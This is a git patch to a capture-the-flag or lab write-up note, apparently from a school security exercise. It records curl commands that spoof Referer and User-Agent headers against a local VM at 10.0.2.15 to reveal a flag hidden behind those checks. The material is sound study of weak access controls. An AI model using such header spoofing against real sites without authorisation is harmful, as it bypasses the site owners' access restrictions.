From b2af25fda585373931c00faa8615e931322a487b Mon Sep 17 00:00:00 2001
From: Thomas Vanbesien <tvanbesi@proton.me>
Date: Fri, 27 Mar 2026 14:14:02 +0100
Subject: Edit notes.md

---
 Information leakage/Resources/notes.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Information leakage/Resources/notes.md b/Information leakage/Resources/notes.md
index 9f13add..eaa3613 100644
--- a/Information leakage/Resources/notes.md	
+++ b/Information leakage/Resources/notes.md	
@@ -1,6 +1,6 @@
 ## Exploit
 
-1. Found a comment saying `You must come from : "https://www.nsa.gov/`
+1. Found a comment saying `You must come from : "https://www.nsa.gov/` at `http://10.0.2.15/?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f`
 1. Since one cannot edit the **Referer** header in Firefox, I used `curl --header "Referer: https://www.nsa.gov" "http://10.0.2.15/?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f"`
 1. Found another comment in the returned page: `Let's use this browser : "ft_bornToSec". It will help you a lot.`
 1. Added a `User-Agent` header `ft_bornToSec` and found the flag. Complete command: `curl --header "User-Agent: ft_bornToSec" --header "Referer: https://www.nsa.gov/" "http://10.0.2.15/index.php?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f" | grep "The flag"`
-- 
cgit v1.2.3